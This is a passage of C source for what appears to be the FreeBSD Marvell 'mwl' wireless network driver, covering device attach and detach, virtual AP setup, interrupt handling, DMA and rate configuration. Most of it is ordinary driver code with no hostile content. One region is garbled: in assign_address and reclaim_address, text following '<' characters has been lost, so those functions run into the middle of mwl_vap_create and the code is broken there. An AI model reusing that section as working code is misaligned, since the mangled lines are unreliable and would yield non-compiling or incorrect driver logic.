qnum, u_int ix); #else #define IFF_DUMPPKTS_RECV(sc, wh) \ ((sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->sc_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == (IFF_DEBUG|IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #define KEYPRINTF(sc, k, mac) do { \ (void) sc; \ } while (0) #endif static MALLOC_DEFINE(M_MWLDEV, "mwldev", "mwl driver dma buffers"); /* * Each packet has fixed front matter: a 2-byte length * of the payload, followed by a 4-address 802.11 header * (regardless of the actual header and always w/o any * QoS header). The payload then follows. */ struct mwltxrec { uint16_t fwlen; struct ieee80211_frame_addr4 wh; } __packed; /* * Read/Write shorthands for accesses to BAR 0. Note * that all BAR 1 operations are done in the "hal" and * there should be no reference to them here. */ #ifdef MWL_DEBUG static __inline uint32_t RD4(struct mwl_softc *sc, bus_size_t off) { return bus_space_read_4(sc->sc_io0t, sc->sc_io0h, off); } #endif static __inline void WR4(struct mwl_softc *sc, bus_size_t off, uint32_t val) { bus_space_write_4(sc->sc_io0t, sc->sc_io0h, off, val); } int mwl_attach(uint16_t devid, struct mwl_softc *sc) { struct ifnet *ifp; struct ieee80211com *ic; struct mwl_hal *mh; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: devid 0x%x\n", __func__, devid); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "cannot if_alloc()\n"); return ENOSPC; } ic = ifp->if_l2com; /* * Setup the RX free list lock early, so it can be consistently * removed. */ MWL_RXFREE_INIT(sc); /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev)); mh = mwl_hal_attach(sc->sc_dev, devid, sc->sc_io1h, sc->sc_io1t, sc->sc_dmat); if (mh == NULL) { if_printf(ifp, "unable to attach HAL\n"); error = EIO; goto bad; } sc->sc_mh = mh; /* * Load firmware so we can get setup. We arbitrarily * pick station firmware; we'll re-load firmware as * needed so setting up the wrong mode isn't a big deal. */ if (mwl_hal_fwload(mh, NULL) != 0) { if_printf(ifp, "unable to setup builtin firmware\n"); error = EIO; goto bad1; } if (mwl_hal_gethwspecs(mh, &sc->sc_hwspecs) != 0) { if_printf(ifp, "unable to fetch h/w specs\n"); error = EIO; goto bad1; } error = mwl_getchannels(sc); if (error != 0) goto bad1; sc->sc_txantenna = 0; /* h/w default */ sc->sc_rxantenna = 0; /* h/w default */ sc->sc_invalid = 0; /* ready to go, enable int handling */ sc->sc_ageinterval = MWL_AGEINTERVAL; /* * Allocate tx+rx descriptors and populate the lists. * We immediately push the information to the firmware * as otherwise it gets upset. */ error = mwl_dma_setup(sc); if (error != 0) { if_printf(ifp, "failed to setup descriptors: %d\n", error); goto bad1; } error = mwl_setupdma(sc); /* push to firmware */ if (error != 0) /* NB: mwl_setupdma prints msg */ goto bad1; callout_init(&sc->sc_timer, CALLOUT_MPSAFE); callout_init_mtx(&sc->sc_watchdog, &sc->sc_mtx, 0); sc->sc_tq = taskqueue_create("mwl_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", ifp->if_xname); TASK_INIT(&sc->sc_rxtask, 0, mwl_rx_proc, sc); TASK_INIT(&sc->sc_radartask, 0, mwl_radar_proc, sc); TASK_INIT(&sc->sc_chanswitchtask, 0, mwl_chanswitch_proc, sc); TASK_INIT(&sc->sc_bawatchdogtask, 0, mwl_bawatchdog_proc, sc); /* NB: insure BK queue is the lowest priority h/w queue */ if (!mwl_tx_setup(sc, WME_AC_BK, MWL_WME_AC_BK)) { if_printf(ifp, "unable to setup xmit queue for %s traffic!\n", ieee80211_wme_acnames[WME_AC_BK]); error = EIO; goto bad2; } if (!mwl_tx_setup(sc, WME_AC_BE, MWL_WME_AC_BE) || !mwl_tx_setup(sc, WME_AC_VI, MWL_WME_AC_VI) || !mwl_tx_setup(sc, WME_AC_VO, MWL_WME_AC_VO)) { /* * Not enough hardware tx queues to properly do WME; * just punt and assign them all to the same h/w queue. * We could do a better job of this if, for example, * we allocate queues when we switch from station to * AP mode. */ if (sc->sc_ac2q[WME_AC_VI] != NULL) mwl_tx_cleanupq(sc, sc->sc_ac2q[WME_AC_VI]); if (sc->sc_ac2q[WME_AC_BE] != NULL) mwl_tx_cleanupq(sc, sc->sc_ac2q[WME_AC_BE]); sc->sc_ac2q[WME_AC_BE] = sc->sc_ac2q[WME_AC_BK]; sc->sc_ac2q[WME_AC_VI] = sc->sc_ac2q[WME_AC_BK]; sc->sc_ac2q[WME_AC_VO] = sc->sc_ac2q[WME_AC_BK]; } TASK_INIT(&sc->sc_txtask, 0, mwl_tx_proc, sc); ifp->if_softc = sc; ifp->if_flags = IFF_SIMPLEX | IFF_BROADCAST | IFF_MULTICAST; ifp->if_start = mwl_start; ifp->if_ioctl = mwl_ioctl; ifp->if_init = mwl_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ #if 0 | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ #endif | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_WDS /* WDS supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WME /* WME/WMM supported */ | IEEE80211_C_BURST /* xmit bursting supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_TXFRAG /* handle tx frags */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ | IEEE80211_C_DFS /* DFS supported */ ; ic->ic_htcaps = IEEE80211_HTCAP_SMPS_ENA /* SM PS mode enabled */ | IEEE80211_HTCAP_CHWIDTH40 /* 40MHz channel width */ | IEEE80211_HTCAP_SHORTGI20 /* short GI in 20MHz */ | IEEE80211_HTCAP_SHORTGI40 /* short GI in 40MHz */ | IEEE80211_HTCAP_RXSTBC_2STREAM/* 1-2 spatial streams */ #if MWL_AGGR_SIZE == 7935 | IEEE80211_HTCAP_MAXAMSDU_7935 /* max A-MSDU length */ #else | IEEE80211_HTCAP_MAXAMSDU_3839 /* max A-MSDU length */ #endif #if 0 | IEEE80211_HTCAP_PSMP /* PSMP supported */ | IEEE80211_HTCAP_40INTOLERANT /* 40MHz intolerant */ #endif /* s/w capabilities */ | IEEE80211_HTC_HT /* HT operation */ | IEEE80211_HTC_AMPDU /* tx A-MPDU */ | IEEE80211_HTC_AMSDU /* tx A-MSDU */ | IEEE80211_HTC_SMPS /* SMPS available */ ; /* * Mark h/w crypto support. * XXX no way to query h/w support. */ ic->ic_cryptocaps |= IEEE80211_CRYPTO_WEP | IEEE80211_CRYPTO_AES_CCM | IEEE80211_CRYPTO_TKIP | IEEE80211_CRYPTO_TKIPMIC ; /* * Transmit requires space in the packet for a special * format transmit record and optional padding between * this record and the payload. Ask the net80211 layer * to arrange this when encapsulating packets so we can * add it efficiently. */ ic->ic_headroom = sizeof(struct mwltxrec) - sizeof(struct ieee80211_frame); /* call MI attach routine. */ ieee80211_ifattach(ic, sc->sc_hwspecs.macAddr); ic->ic_setregdomain = mwl_setregdomain; ic->ic_getradiocaps = mwl_getradiocaps; /* override default methods */ ic->ic_raw_xmit = mwl_raw_xmit; ic->ic_newassoc = mwl_newassoc; ic->ic_updateslot = mwl_updateslot; ic->ic_update_mcast = mwl_update_mcast; ic->ic_update_promisc = mwl_update_promisc; ic->ic_wme.wme_update = mwl_wme_update; ic->ic_node_alloc = mwl_node_alloc; sc->sc_node_cleanup = ic->ic_node_cleanup; ic->ic_node_cleanup = mwl_node_cleanup; sc->sc_node_drain = ic->ic_node_drain; ic->ic_node_drain = mwl_node_drain; ic->ic_node_getsignal = mwl_node_getsignal; ic->ic_node_getmimoinfo = mwl_node_getmimoinfo; ic->ic_scan_start = mwl_scan_start; ic->ic_scan_end = mwl_scan_end; ic->ic_set_channel = mwl_set_channel; sc->sc_recv_action = ic->ic_recv_action; ic->ic_recv_action = mwl_recv_action; sc->sc_addba_request = ic->ic_addba_request; ic->ic_addba_request = mwl_addba_request; sc->sc_addba_response = ic->ic_addba_response; ic->ic_addba_response = mwl_addba_response; sc->sc_addba_stop = ic->ic_addba_stop; ic->ic_addba_stop = mwl_addba_stop; ic->ic_vap_create = mwl_vap_create; ic->ic_vap_delete = mwl_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), MWL_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), MWL_RX_RADIOTAP_PRESENT); /* * Setup dynamic sysctl's now that country code and * regdomain are available from the hal. */ mwl_sysctlattach(sc); if (bootverbose) ieee80211_announce(ic); mwl_announce(sc); return 0; bad2: mwl_dma_cleanup(sc); bad1: mwl_hal_detach(mh); bad: MWL_RXFREE_DESTROY(sc); if_free(ifp); sc->sc_invalid = 1; return error; } int mwl_detach(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); mwl_stop(ifp, 1); /* * NB: the order of these is important: * o call the 802.11 layer before detaching the hal to * insure callbacks into the driver to delete global * key cache entries can be handled * o reclaim the tx queue data structures after calling * the 802.11 layer as we'll get called back to reclaim * node state and potentially want to use them * o to cleanup the tx queues the hal is called, so detach * it last * Other than that, it's straightforward... */ ieee80211_ifdetach(ic); callout_drain(&sc->sc_watchdog); mwl_dma_cleanup(sc); MWL_RXFREE_DESTROY(sc); mwl_tx_cleanup(sc); mwl_hal_detach(sc->sc_mh); if_free(ifp); return 0; } /* * MAC address handling for multiple BSS on the same radio. * The first vap uses the MAC address from the EEPROM. For * subsequent vap's we set the U/L bit (bit 1) in the MAC * address and use the next six bits as an index. */ static void assign_address(struct mwl_softc *sc, uint8_t mac[IEEE80211_ADDR_LEN], int clone) { int i; if (clone && mwl_hal_ismbsscapable(sc->sc_mh)) { /* NB: we only do this if h/w supports multiple bssid */ for (i = 0; i < 32; i++) if ((sc->sc_bssidmask & (1<sc_bssidmask |= 1<sc_nbssid0++; } static void reclaim_address(struct mwl_softc *sc, uint8_t mac[IEEE80211_ADDR_LEN]) { int i = mac[0] >> 2; if (i != 0 || --sc->sc_nbssid0 == 0) sc->sc_bssidmask &= ~(1<ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; struct ieee80211vap *vap, *apvap; struct mwl_hal_vap *hvap; struct mwl_vap *mvp; uint8_t mac[IEEE80211_ADDR_LEN]; IEEE80211_ADDR_COPY(mac, mac0); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: if ((flags & IEEE80211_CLONE_MACADDR) == 0) assign_address(sc, mac, flags & IEEE80211_CLONE_BSSID); hvap = mwl_hal_newvap(mh, MWL_HAL_AP, mac); if (hvap == NULL) { if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); return NULL; } break; case IEEE80211_M_STA: if ((flags & IEEE80211_CLONE_MACADDR) == 0) assign_address(sc, mac, flags & IEEE80211_CLONE_BSSID); hvap = mwl_hal_newvap(mh, MWL_HAL_STA, mac); if (hvap == NULL) { if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); return NULL; } /* no h/w beacon miss support; always use s/w */ flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: hvap = NULL; /* NB: we use associated AP vap */ if (sc->sc_napvaps == 0) return NULL; /* no existing AP vap */ break; case IEEE80211_M_MONITOR: hvap = NULL; break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: default: return NULL; } mvp = (struct mwl_vap *) malloc(sizeof(struct mwl_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (mvp == NULL) { if (hvap != NULL) { mwl_hal_delvap(hvap); if ((flags & IEEE80211_CLONE_MACADDR) == 0) reclaim_address(sc, mac); } /* XXX msg */ return NULL; } mvp->mv_hvap = hvap; if (opmode == IEEE80211_M_WDS) { /* * WDS vaps must have an associated AP vap; find one. * XXX not right. */ TAILQ_FOREACH(apvap, &ic->ic_vaps, iv_next) if (apvap->iv_opmode == IEEE80211_M_HOSTAP) { mvp->mv_ap_hvap = MWL_VAP(apvap)->mv_hvap; break; } KASSERT(mvp->mv_ap_hvap != NULL, ("no ap vap")); } vap = &mvp->mv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); if (hvap != NULL) IEEE80211_ADDR_COPY(vap->iv_myaddr, mac); /* override with driver methods */ mvp->mv_newstate = vap->iv_newstate; vap->iv_newstate = mwl_newstate; vap->iv_max_keyix = 0; /* XXX */ vap->iv_key_alloc = mwl_key_alloc; vap->iv_key_delete = mwl_key_delete; vap->iv_key_set = mwl_key_set; #ifdef MWL_HOST_PS_SUPPORT if (opmode == IEEE80211_M_HOSTAP || opmode == IEEE80211_M_MBSS) { vap->iv_update_ps = mwl_update_ps; mvp->mv_set_tim = vap->iv_set_tim; vap->iv_set_tim = mwl_set_tim; } #endif vap->iv_reset = mwl_reset; vap->iv_update_beacon = mwl_beacon_update; /* override max aid so sta's cannot assoc when we're out of sta id's */ vap->iv_max_aid = MWL_MAXSTAID; /* override default A-MPDU rx parameters */ vap->iv_ampdu_rxmax = IEEE80211_HTCAP_MAXRXAMPDU_64K; vap->iv_ampdu_density = IEEE80211_HTCAP_MPDUDENSITY_4; /* complete setup */ ieee80211_vap_attach(vap, mwl_media_change, ieee80211_media_status); switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: /* * Setup sta db entry for local address. */ mwl_localstadb(vap); if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) sc->sc_napvaps++; else sc->sc_nstavaps++; break; case IEEE80211_M_WDS: sc->sc_nwdsvaps++; break; default: break; } /* * Setup overall operating mode. */ if (sc->sc_napvaps) ic->ic_opmode = IEEE80211_M_HOSTAP; else if (sc->sc_nstavaps) ic->ic_opmode = IEEE80211_M_STA; else ic->ic_opmode = opmode; return vap; } static void mwl_vap_delete(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ifnet *parent = vap->iv_ic->ic_ifp; struct mwl_softc *sc = parent->if_softc; struct mwl_hal *mh = sc->sc_mh; struct mwl_hal_vap *hvap = mvp->mv_hvap; enum ieee80211_opmode opmode = vap->iv_opmode; /* XXX disallow ap vap delete if WDS still present */ if (parent->if_drv_flags & IFF_DRV_RUNNING) { /* quiesce h/w while we remove the vap */ mwl_hal_intrset(mh, 0); /* disable interrupts */ } ieee80211_vap_detach(vap); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: KASSERT(hvap != NULL, ("no hal vap handle")); (void) mwl_hal_delstation(hvap, vap->iv_myaddr); mwl_hal_delvap(hvap); if (opmode == IEEE80211_M_HOSTAP || opmode == IEEE80211_M_MBSS) sc->sc_napvaps--; else sc->sc_nstavaps--; /* XXX don't do it for IEEE80211_CLONE_MACADDR */ reclaim_address(sc, vap->iv_myaddr); break; case IEEE80211_M_WDS: sc->sc_nwdsvaps--; break; default: break; } mwl_cleartxq(sc, vap); free(mvp, M_80211_VAP); if (parent->if_drv_flags & IFF_DRV_RUNNING) mwl_hal_intrset(mh, sc->sc_imask); } void mwl_suspend(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); mwl_stop(ifp, 1); } void mwl_resume(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); if (ifp->if_flags & IFF_UP) mwl_init(sc); } void mwl_shutdown(void *arg) { struct mwl_softc *sc = arg; mwl_stop(sc->sc_ifp, 1); } /* * Interrupt handler. Most of the actual processing is deferred. */ void mwl_intr(void *arg) { struct mwl_softc *sc = arg; struct mwl_hal *mh = sc->sc_mh; uint32_t status; if (sc->sc_invalid) { /* * The hardware is not ready/present, don't touch anything. * Note this can happen early on if the IRQ is shared. */ DPRINTF(sc, MWL_DEBUG_ANY, "%s: invalid; ignored\n", __func__); return; } /* * Figure out the reason(s) for the interrupt. */ mwl_hal_getisr(mh, &status); /* NB: clears ISR too */ if (status == 0) /* must be a shared irq */ return; DPRINTF(sc, MWL_DEBUG_INTR, "%s: status 0x%x imask 0x%x\n", __func__, status, sc->sc_imask); if (status & MACREG_A2HRIC_BIT_RX_RDY) taskqueue_enqueue(sc->sc_tq, &sc->sc_rxtask); if (status & MACREG_A2HRIC_BIT_TX_DONE) taskqueue_enqueue(sc->sc_tq, &sc->sc_txtask); if (status & MACREG_A2HRIC_BIT_BA_WATCHDOG) taskqueue_enqueue(sc->sc_tq, &sc->sc_bawatchdogtask); if (status & MACREG_A2HRIC_BIT_OPC_DONE) mwl_hal_cmddone(mh); if (status & MACREG_A2HRIC_BIT_MAC_EVENT) { ; } if (status & MACREG_A2HRIC_BIT_ICV_ERROR) { /* TKIP ICV error */ sc->sc_stats.mst_rx_badtkipicv++; } if (status & MACREG_A2HRIC_BIT_QUEUE_EMPTY) { /* 11n aggregation queue is empty, re-fill */ ; } if (status & MACREG_A2HRIC_BIT_QUEUE_FULL) { ; } if (status & MACREG_A2HRIC_BIT_RADAR_DETECT) { /* radar detected, process event */ taskqueue_enqueue(sc->sc_tq, &sc->sc_radartask); } if (status & MACREG_A2HRIC_BIT_CHAN_SWITCH) { /* DFS channel switch */ taskqueue_enqueue(sc->sc_tq, &sc->sc_chanswitchtask); } } static void mwl_radar_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: radar detected, pending %u\n", __func__, pending); sc->sc_stats.mst_radardetect++; /* XXX stop h/w BA streams? */ IEEE80211_LOCK(ic); ieee80211_dfs_notify_radar(ic, ic->ic_curchan); IEEE80211_UNLOCK(ic); } static void mwl_chanswitch_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MWL_DEBUG_ANY, "%s: channel switch notice, pending %u\n", __func__, pending); IEEE80211_LOCK(ic); sc->sc_csapending = 0; ieee80211_csa_completeswitch(ic); IEEE80211_UNLOCK(ic); } static void mwl_bawatchdog(const MWL_HAL_BASTREAM *sp) { struct ieee80211_node *ni = sp->data[0]; /* send DELBA and drop the stream */ ieee80211_ampdu_stop(ni, sp->data[1], IEEE80211_REASON_UNSPECIFIED); } static void mwl_bawatchdog_proc(void *arg, int pending) { struct mwl_softc *sc = arg; struct mwl_hal *mh = sc->sc_mh; const MWL_HAL_BASTREAM *sp; uint8_t bitmap, n; sc->sc_stats.mst_bawatchdog++; if (mwl_hal_getwatchdogbitmap(mh, &bitmap) != 0) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: could not get bitmap\n", __func__); sc->sc_stats.mst_bawatchdog_failed++; return; } DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: bitmap 0x%x\n", __func__, bitmap); if (bitmap == 0xff) { n = 0; /* disable all ba streams */ for (bitmap = 0; bitmap < 8; bitmap++) { sp = mwl_hal_bastream_lookup(mh, bitmap); if (sp != NULL) { mwl_bawatchdog(sp); n++; } } if (n == 0) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA streams found\n", __func__); sc->sc_stats.mst_bawatchdog_empty++; } } else if (bitmap != 0xaa) { /* disable a single ba stream */ sp = mwl_hal_bastream_lookup(mh, bitmap); if (sp != NULL) { mwl_bawatchdog(sp); } else { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA stream %d\n", __func__, bitmap); sc->sc_stats.mst_bawatchdog_notfound++; } } } /* * Convert net80211 channel to a HAL channel. */ static void mwl_mapchan(MWL_HAL_CHANNEL *hc, const struct ieee80211_channel *chan) { hc->channel = chan->ic_ieee; *(uint32_t *)&hc->channelFlags = 0; if (IEEE80211_IS_CHAN_2GHZ(chan)) hc->channelFlags.FreqBand = MWL_FREQ_BAND_2DOT4GHZ; else if (IEEE80211_IS_CHAN_5GHZ(chan)) hc->channelFlags.FreqBand = MWL_FREQ_BAND_5GHZ; if (IEEE80211_IS_CHAN_HT40(chan)) { hc->channelFlags.ChnlWidth = MWL_CH_40_MHz_WIDTH; if (IEEE80211_IS_CHAN_HT40U(chan)) hc->channelFlags.ExtChnlOffset = MWL_EXT_CH_ABOVE_CTRL_CH; else hc->channelFlags.ExtChnlOffset = MWL_EXT_CH_BELOW_CTRL_CH; } else hc->channelFlags.ChnlWidth = MWL_CH_20_MHz_WIDTH; /* XXX 10MHz channels */ } /* * Inform firmware of our tx/rx dma setup. The BAR 0 * writes below are for compatibility with older firmware. * For current firmware we send this information with a * cmd block via mwl_hal_sethwdma. */ static int mwl_setupdma(struct mwl_softc *sc) { int error, i; sc->sc_hwdma.rxDescRead = sc->sc_rxdma.dd_desc_paddr; WR4(sc, sc->sc_hwspecs.rxDescRead, sc->sc_hwdma.rxDescRead); WR4(sc, sc->sc_hwspecs.rxDescWrite, sc->sc_hwdma.rxDescRead); for (i = 0; i < MWL_NUM_TX_QUEUES-MWL_NUM_ACK_QUEUES; i++) { struct mwl_txq *txq = &sc->sc_txq[i]; sc->sc_hwdma.wcbBase[i] = txq->dma.dd_desc_paddr; WR4(sc, sc->sc_hwspecs.wcbBase[i], sc->sc_hwdma.wcbBase[i]); } sc->sc_hwdma.maxNumTxWcb = mwl_txbuf; sc->sc_hwdma.maxNumWCB = MWL_NUM_TX_QUEUES-MWL_NUM_ACK_QUEUES; error = mwl_hal_sethwdma(sc->sc_mh, &sc->sc_hwdma); if (error != 0) { device_printf(sc->sc_dev, "unable to setup tx/rx dma; hal status %u\n", error); /* XXX */ } return error; } /* * Inform firmware of tx rate parameters. * Called after a channel change. */ static int mwl_setcurchanrates(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct ieee80211_rateset *rs; MWL_HAL_TXRATE rates; memset(&rates, 0, sizeof(rates)); rs = ieee80211_get_suprates(ic, ic->ic_curchan); /* rate used to send management frames */ rates.MgtRate = rs->rs_rates[0] & IEEE80211_RATE_VAL; /* rate used to send multicast frames */ rates.McastRate = rates.MgtRate; return mwl_hal_settxrate_auto(sc->sc_mh, &rates); } /* * Inform firmware of tx rate parameters. Called whenever * user-settable params change and after a channel change. */ static int mwl_setrates(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ieee80211_node *ni = vap->iv_bss; const struct ieee80211_txparam *tp = ni->ni_txparms; MWL_HAL_TXRATE rates; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); /* * Update the h/w rate map. * NB: 0x80 for MCS is passed through unchanged */ memset(&rates, 0, sizeof(rates)); /* rate used to send management frames */ rates.MgtRate = tp->mgmtrate; /* rate used to send multicast frames */ rates.McastRate = tp->mcastrate; /* while here calculate EAPOL fixed rate cookie */ mvp->mv_eapolformat = htole16(mwl_calcformat(rates.MgtRate, ni)); return mwl_hal_settxrate(mvp->mv_hvap, tp->ucastrate != IEEE80211_FIXED_RATE_NONE ? RATE_FIXED : RATE_AUTO, &rates); } /* * Setup a fixed xmit rate cookie for EAPOL frames. */ static void mwl_seteapolformat(struct ieee80211vap *vap) { struct mwl_vap *mvp = MWL_VAP(vap); struct ieee80211_node *ni = vap->iv_bss; enum ieee80211_phymode mode; uint8_t rate; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); mode = ieee80211_chan2mode(ni->ni_chan); /* * Use legacy rates when operating a mixed HT+non-HT bss. * NB: this may violate POLA for sta and wds vap's. */ if (mode == IEEE80211_MODE_11NA && (vap->iv_flags_ht & IEEE80211_FHT_PUREN) == 0) rate = vap->iv_txparms[IEEE80211_MODE_11A].mgmtrate; else if (mode == IEEE80211_MODE_11NG && (vap->iv_flags_ht & IEEE80211_FHT_PUREN) == 0) rate = vap->iv_txparms[IEEE80211_MODE_11G].mgmtrate; else rate = vap->iv_txparms[mode].mgmtrate; mvp->mv_eapolformat = htole16(mwl_calcformat(rate, ni)); } /* * Map SKU+country code to region code for radar bin'ing. */ static int mwl_map2regioncode(const struct ieee80211_regdomain *rd) { switch (rd->regdomain) { case SKU_FCC: case SKU_FCC3: return DOMAIN_CODE_FCC; case SKU_CA: return DOMAIN_CODE_IC; case SKU_ETSI: case SKU_ETSI2: case SKU_ETSI3: if (rd->country == CTRY_SPAIN) return DOMAIN_CODE_SPAIN; if (rd->country == CTRY_FRANCE || rd->country == CTRY_FRANCE2) return DOMAIN_CODE_FRANCE; /* XXX force 1.3.1 radar type */ return DOMAIN_CODE_ETSI_131; case SKU_JAPAN: return DOMAIN_CODE_MKK; case SKU_ROW: return DOMAIN_CODE_DGT; /* Taiwan */ case SKU_APAC: case SKU_APAC2: case SKU_APAC3: return DOMAIN_CODE_AUS; /* Australia */ } /* XXX KOREA? */ return DOMAIN_CODE_FCC; /* XXX? */ } static int mwl_hal_reset(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; mwl_hal_setantenna(mh, WL_ANTENNATYPE_RX, sc->sc_rxantenna); mwl_hal_setantenna(mh, WL_ANTENNATYPE_TX, sc->sc_txantenna); mwl_hal_setradio(mh, 1, WL_AUTO_PREAMBLE); mwl_hal_setwmm(sc->sc_mh, (ic->ic_flags & IEEE80211_F_WME) != 0); mwl_chan_set(sc, ic->ic_curchan); /* NB: RF/RA performance tuned for indoor mode */ mwl_hal_setrateadaptmode(mh, 0); mwl_hal_setoptimizationlevel(mh, (ic->ic_flags & IEEE80211_F_BURST) != 0); mwl_hal_setregioncode(mh, mwl_map2regioncode(&ic->ic_regdomain)); mwl_hal_setaggampduratemode(mh, 1, 80); /* XXX */ mwl_hal_setcfend(mh, 0); /* XXX */ return 1; } static int mwl_init_locked(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct mwl_hal *mh = sc->sc_mh; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MWL_LOCK_ASSERT(sc); /* * Stop anything previously setup. This is safe * whether this is the first time through or not. */ mwl_stop_locked(ifp, 0); /* * Push vap-independent state to the firmware. */ if (!mwl_hal_reset(sc)) { if_printf(ifp, "unable to reset hardware\n"); return EIO; } /* * Setup recv (once); transmit is already good to go. */ error = mwl_startrecv(sc); if (error != 0) { if_printf(ifp, "unable to start recv logic\n"); return error; } /* * Enable interrupts. */ sc->sc_imask = MACREG_A2HRIC_BIT_RX_RDY | MACREG_A2HRIC_BIT_TX_DONE | MACREG_A2HRIC_BIT_OPC_DONE #if 0 | MACREG_A2HRIC_BIT_MAC_EVENT #endif | MACREG_A2HRIC_BIT_ICV_ERROR | MACREG_A2HRIC_BIT_RADAR_DETECT | MACREG_A2HRIC_BIT_CHAN_SWITCH #if 0 | MACREG_A2HRIC_BIT_QUEUE_EMPTY #endif | MACREG_A2HRIC_BIT_BA_WATCHDOG | MACREQ_A2HRIC_BIT_TX_ACK ; ifp->if_drv_flags |= IFF_DRV_RUNNING; mwl_hal_intrset(mh, sc->sc_imask); callout_reset(&sc->sc_watchdog, hz, mwl_watchdog, sc); return 0; } static void mwl_init(void *arg) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MWL_LOCK(sc); error = mwl_init_locked(sc); MWL_UNLOCK(sc); if (error == 0) ieee80211_start_all(ic); /* start all vap's */ } static void mwl_stop_locked(struct ifnet *ifp, int disable) { struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_ANY, "%s: invalid %u if_flags 0x%x\n", __func__, sc->sc_invalid, ifp->if_flags); MWL_LOCK_ASSERT(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { /* * Shutdown the hardware and driver. */ ifp->if_drv_flags &= ~IFF_DRV_RUNNING; callout_stop(&sc->sc_watchdog); sc->sc_tx_timer = 0; mwl_draintxq(sc); } } static void mwl_stop(struct ifnet *ifp, int disable) { struct mwl_softc *sc = ifp->if_softc; MWL_LOCK(sc); mwl_stop_locked(ifp, disable); MWL_UNLOCK(sc); } static int mwl_reset_vap(struct ieee80211vap *vap, int state) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211com *ic = vap->iv_ic; if (state == IEEE80211_S_RUN) mwl_setrates(vap); /* XXX off by 1? */ 